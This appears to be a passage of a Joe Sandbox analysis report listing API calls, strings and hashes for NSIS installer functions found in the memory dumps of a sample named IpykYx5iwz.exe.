Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
Instruction ID: fd1ad9f6dcd714b8658ec893e153b4722c010677cf0d3a214713980260d8cc5f
Opcode Fuzzy Hash: dfed55a16eab86d89f3af7970decdd3a6c9dbbcd65d2cf450bad9cf681275afb
Instruction Fuzzy Hash: 38D023B2601930BAD20177155D09DCF590D8F033407060037F100B62E2CB7C0D1147FD

Function 00405B72 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,?,00405BDE,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405B80
CharNextA.USER32(00000000), ref: 00405B85
CharNextA.USER32(00000000), ref: 00405B99

Strings

C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 00405B73

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
API String ID: 3213498283-2847000489
Opcode ID: 004fc1c2ce2bb0b6fc58f47b15acfd4bce5f7aaa34e7cd5c8c8eaaa68dd96ba0
Instruction ID: 2247cc7d81e988e78f7fba759403175a3c921c0d4e439e116ee2670e70ad05bf
Opcode Fuzzy Hash: 004fc1c2ce2bb0b6fc58f47b15acfd4bce5f7aaa34e7cd5c8c8eaaa68dd96ba0
Instruction Fuzzy Hash: 62F06251905F946BFB2292290C44B7B7FA8CB55751F1440B7D641B62C286BC78408F9A

Function 0040386C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002E8,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 0040387E
CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,004036A3,?,?,00000006,00000008,0000000A), ref: 00403892

Strings

C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 004038A2
C:\Users\user\AppData\Local\Temp\, xrefs: 00403871

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
API String ID: 2962429428-2423888734
Opcode ID: a4c6a579f0772344a9a2a3336061ec44cd3ccb1160300cadaff394e364a80da6
Instruction ID: 07b74b36f59eaba180cbc95ad97f7473792aac15869385964b078aebb90d4677
Opcode Fuzzy Hash: a4c6a579f0772344a9a2a3336061ec44cd3ccb1160300cadaff394e364a80da6
Instruction Fuzzy Hash: B5E04F3150071896C5247F78BD494853B595B413357248776F078B20F0C73899564AA9

Function 00405BC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E

Part of subcall function 00405B72: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,?,00405BDE,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405B80
Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B85
Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B99

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405C1A
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 00405C2A

Strings

C:\Users\user\AppData\Local\Temp\nsz7B51.tmp, xrefs: 00405BCD, 00405BD2, 00405BD8, 00405C13, 00405C19, 00405C21, 00405C29

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp
API String ID: 3248276644-2847000489
Opcode ID: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
Instruction ID: f44c27dbebaf7467ddcf3faaec1fa70c7ffebf3acca808db2791febee6a049cb
Opcode Fuzzy Hash: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
Instruction Fuzzy Hash: 04F02D3510CE5016DA22333A1C06AAF6654CE8332871D013BFC52752D2CB3CA4529D7D

Function 004051DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040520B
CallWindowProcA.USER32(?,?,?,?), ref: 0040525C

Part of subcall function 0040421B: SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 0040422D

Strings

, xrefs: 004051EC

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
Instruction ID: ea2b2a229446d05cd35f1ac4721927dc1f932898565a27d058a062da5ba1ec36
Opcode Fuzzy Hash: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
Instruction Fuzzy Hash: 8E017131200608ABEF215F51ED84A5B3A6AFF84354F54447BFA00762E1C739AC529E5A

Function 004057E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405809
CloseHandle.KERNEL32(?), ref: 00405816

Strings

Error launching installer, xrefs: 004057F3

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
Instruction ID: ab941a05c4999c1485253c76fd5e070cef9538b2f1a85a786da17f0f1360f2f3
Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
Instruction Fuzzy Hash: 6FE04FF06002097FEB00AF60EE49F7B77ACEB10704F808431BD00F2150D67898548A7C

Function 00405B20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IpykYx5iwz.exe,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405B26
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E80,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IpykYx5iwz.exe,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405B34

Strings

C:\Users\user\Desktop, xrefs: 00405B20

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
Instruction ID: ad81f5c4ab787ee770feeffe55fa4e6664f7768c70419f776603619960e766e8
Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
Instruction Fuzzy Hash: 31D0A7B2408D705EE3036210DD04B8F7A99CF12300F0A00A3E081B6191C6786C4287BD

Function 00405C3F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C67
CharNextA.USER32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C78
lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
Instruction ID: e9647eef7302a9b27fadec00dc75fba78c5d05178a58941879d213f1a9d3a1c7
Opcode Fuzzy Hash: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
Instruction Fuzzy Hash: 5BF0C231105918FFDB029FA4DD409AEBBA8EF05250B2540BAE840F7210D634EE01AB98

Analysis Process: IpykYx5iwz.exePID: 180, Parent PID: 3608COMMON

Non-executed Functions

Function 00403384 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 366stringcomfileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004033A9
GetVersion.KERNEL32 ref: 004033AF
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033E2
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040341E
OleInitialize.OLE32(00000000), ref: 00403425
SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403441
GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403456
CharNextA.USER32(00000000,0042A000,00000020,0042A000,00000000,?,00000006,00000008,0000000A), ref: 00403492
GetTempPathA.KERNEL32(00000400,0042B400,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040358F
GetWindowsDirectoryA.KERNEL32(0042B400,000003FB,?,00000006,00000008,0000000A), ref: 004035A0
lstrcatA.KERNEL32(0042B400,\Temp,?,00000006,00000008,0000000A), ref: 004035AC
GetTempPathA.KERNEL32(000003FC,0042B400,0042B400,\Temp,?,00000006,00000008,0000000A), ref: 004035C0
lstrcatA.KERNEL32(0042B400,Low,?,00000006,00000008,0000000A), ref: 004035C8
SetEnvironmentVariableA.KERNEL32(TEMP,0042B400,0042B400,Low,?,00000006,00000008,0000000A), ref: 004035D9
SetEnvironmentVariableA.KERNEL32(TMP,0042B400,?,00000006,00000008,0000000A), ref: 004035E1
DeleteFileA.KERNEL32(0042B000,?,00000006,00000008,0000000A), ref: 004035F5

Part of subcall function 004064D9: GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
Part of subcall function 004064D9: GetProcAddress.KERNEL32(00000000,?), ref: 00406506

Part of subcall function 0040395E: lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,74DF3410), ref: 00403A4E
Part of subcall function 0040395E: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A61
Part of subcall function 0040395E: GetFileAttributesA.KERNEL32(004236C0), ref: 00403A6C
Part of subcall function 0040395E: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403AB5
Part of subcall function 0040395E: RegisterClassA.USER32(00423EC0), ref: 00403AF2

Part of subcall function 0040386C: CloseHandle.KERNEL32(FFFFFFFF,0042B400,004036A3,?,?,00000006,00000008,0000000A), ref: 0040387E
Part of subcall function 0040386C: CloseHandle.KERNEL32(FFFFFFFF,0042B400,004036A3,?,?,00000006,00000008,0000000A), ref: 00403892

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004036A3
ExitProcess.KERNEL32 ref: 004036C4
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004037E1
OpenProcessToken.ADVAPI32(00000000), ref: 004037E8
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403800
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040381F
ExitWindowsEx.USER32(00000002,80040002), ref: 00403843
ExitProcess.KERNEL32 ref: 00403866

Part of subcall function 0040585D: MessageBoxIndirectA.USER32(0040A230), ref: 004058B8

Strings

UXTHEME, xrefs: 004033D6, 004033DB, 004033E1
Low, xrefs: 004035C2
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403398
NSIS Error, xrefs: 00403447
~nsu, xrefs: 004036CF
Error launching installer, xrefs: 0040365B
", xrefs: 004034B7
TEMP, xrefs: 004035D4
.tmp, xrefs: 004036EB
TMP, xrefs: 004035DC
\Temp, xrefs: 004035A6
SeShutdownPrivilege, xrefs: 004037FA

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$.tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 538718688-3941163293
Opcode ID: 458bdf0e04cdd0baede758a66e37d725f1f5fb22902ef0c1a756b50b2141e9f2
Instruction ID: 4384c8e2b939b42067d375ed445cc130ba198a6ce93f9d773e0a7c2deed02dc2
Opcode Fuzzy Hash: 458bdf0e04cdd0baede758a66e37d725f1f5fb22902ef0c1a756b50b2141e9f2
Instruction Fuzzy Hash: 98C108706047506AD721AF75AD49B2B3EACEF81306F05443FF591BA1E2CB7C8A15872E

Function 00405909 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,74DF3410,74DF2EE0,00000000), ref: 00405932
lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040597A
lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 0040599B
lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059A1
FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,74DF3410,74DF2EE0,00000000), ref: 004059B2
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A5F
FindClose.KERNEL32(00000000), ref: 00405A70

Strings

\*.*, xrefs: 00405974

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 1f6095b956a5abea02a704f6b19d74ec103097257d08da1b7e7a910a37ef6182
Instruction ID: 27aaa2d61bcc81dbc7fe7a1ecb0f7f08d06d16e834bef461c94bc9154c43beac
Opcode Fuzzy Hash: 1f6095b956a5abea02a704f6b19d74ec103097257d08da1b7e7a910a37ef6182
Instruction Fuzzy Hash: 9651B271A04A04AACB21AB618C89BBF7BB8DF42724F14427BF451751D2D73C4982DE6E

Function 004067CD Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
Instruction ID: 7a1e34af05216305e42a36fadcfa131d67e9d7ad70080566c8310abef1b5d03e
Opcode Fuzzy Hash: 3d7b46422ea3febcc3dfec7e4f4e14f5e1a14e9fd76d5679f282581756d1a8c3
Instruction Fuzzy Hash: 2CF18571D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A86CF45

Function 004053A6 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405405
GetDlgItem.USER32(?,000003EE), ref: 00405414
GetClientRect.USER32(?,?), ref: 00405451
GetSystemMetrics.USER32(00000002), ref: 00405458
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405479
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040548A
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040549D
SendMessageA.USER32(?,00001026,00000000,?), ref: 004054AB
SendMessageA.USER32(?,00001024,00000000,?), ref: 004054BE
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004054E0
ShowWindow.USER32(?,00000008), ref: 004054F4
GetDlgItem.USER32(?,000003EC), ref: 00405515
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405525
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040553E
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040554A
GetDlgItem.USER32(?,000003F8), ref: 00405423

Part of subcall function 00404204: SendMessageA.USER32(00000028,?,00000001,00404034), ref: 00404212

GetDlgItem.USER32(?,000003EC), ref: 00405566
CreateThread.KERNEL32(00000000,00000000,Function_0000533A,00000000), ref: 00405574
CloseHandle.KERNEL32(00000000), ref: 0040557B
ShowWindow.USER32(00000000), ref: 0040559E
ShowWindow.USER32(?,00000008), ref: 004055A5
ShowWindow.USER32(00000008), ref: 004055EB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040561F
CreatePopupMenu.USER32 ref: 00405630
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405645
GetWindowRect.USER32(?,000000FF), ref: 00405665
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040567E
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056BA
OpenClipboard.USER32(00000000), ref: 004056CA
EmptyClipboard.USER32 ref: 004056D0
GlobalAlloc.KERNEL32(00000042,?), ref: 004056D9
GlobalLock.KERNEL32(00000000), ref: 004056E3
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056F7
GlobalUnlock.KERNEL32(00000000), ref: 00405710
SetClipboardData.USER32(00000001,00000000), ref: 0040571B
CloseClipboard.USER32 ref: 00405721

Strings

0B, xrefs: 00405696

Memory Dump Source

Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: 0B
API String ID: 590372296-4132856435
Opcode ID: ac0908efb29991f9f7612423f5cb2e6f0edb2ee2ffb265e7f658777761b029f9
